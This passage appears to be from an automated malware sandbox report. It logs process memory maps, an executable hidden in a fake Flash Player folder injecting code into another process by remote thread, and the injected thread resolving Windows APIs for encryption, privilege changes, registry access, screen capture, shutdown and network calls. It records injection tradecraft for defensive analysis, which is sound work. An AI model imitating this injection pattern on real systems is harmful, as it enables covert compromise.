ole32.dll 0x75ae0000 0x75c3bfff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x75c40000 0x75e3afff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x75e70000 0x75f1bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75f20000 0x76014fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x760b0000 0x7610ffff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76110000 0x761acfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x761b0000 0x7623efff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x76240000 0x7635cfff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x76360000 0x7636bfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76370000 0x763c6fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76570000 0x7663bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x76640000 0x76685fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76690000 0x767c5fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x767d0000 0x767e8fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76800000 0x768effff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x768f0000 0x768f9fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76950000 0x769dffff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x76a70000 0x776b9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000778b0000 0x778b0000 0x779a9fff Private Memory Readable, Writable, Executable True False False
private_0x00000000779b0000 0x779b0000 0x77acefff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77ad0000 0x77c78fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77cb0000 0x77e2ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x6a8 address = 0x70000, size = 114688 True 1
Fn
Data
Modify Memory #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x6a8 address = 0x876c4, size = 4 True 1
Fn
Data
Modify Memory #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x6a8 address = 0x877d0, size = 4 True 1
Fn
Data
Modify Memory #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x6a8 address = 0x87d38, size = 4 True 1
Fn
Data
Create Remote Thread #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x6a8 address = 0x795bc True 1
Fn
Threads
Thread 0x350
(Host: 244, Network: 0)
+
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x759d7a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x759e10b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x759d34d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77ce45f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x759ddd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x759d5a7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x759fd4c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x759d103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x759d1400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x759ed9c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x759fd075 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x759d5151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x759ece2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x759d17ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x759d469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x759d1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x759d1886 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x759d1245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x77d2742b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x759d7a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x759d11f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x759f830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x759d195e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x759ed851 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x759f5c1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x759fc7ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a5416b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a5414b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a541df True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a540fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x759d5371 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x759d418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x759d44ab True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x759d1b48 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x759d17d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77ce2c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x759d465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x759d1986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x759d4407 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x759d111e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77cd2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x759d4950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x759eecbb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77cd22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x759d15d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x759ed9e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x759d1462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x759ec860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x759d4259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x759d34b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x759f8baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x759f896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x759d11c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x759f735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x759d424c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x759d16dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x759d16c5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x759d183e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x759d4220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x759d110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x758e49ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x758e8deb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x758dfbd1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x758e1218 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77ce25dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x758d8a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x758d9f84 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x758e2e69 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x758e3e75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75931a26 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x758d7809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x758e05ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x758d787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x758db17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x758e6110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x758dd156 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x758df350 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x76240000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x76256c0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x7624d718 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x777545f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7776779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77750e0c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x777540e6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77750e24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x77752a66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x777540fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x7774c54a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x77749fe2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x7774f4fd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x77754680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x777514d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77754304 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7775412e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x77754620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7774c532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x7775432c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7775431c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7774c51a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7775418e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7775415e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x77754608 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x777541b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x7775413b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x7774cf31 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7776773f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x7774e15b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x777546e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x7775445b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7779db3a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76a83c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76a91e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x763845bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x763855bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x763acd81 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x76384745 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x763ad32a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x76383248 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7638c177 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x76385331 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x7639fbf5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7638a1b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x7637fcca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x7637ff07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x76385c62 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x7639c6fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x763ace21 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x75ad13f0 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x75afe599 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75b209ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75af5ea5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75b286d3 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76965689 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76964de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7696e743 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x769654f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76964f70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76965f49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76965ea6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x769658b3 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x75f449e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75f3b406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x75f3a33e True 1
Fn
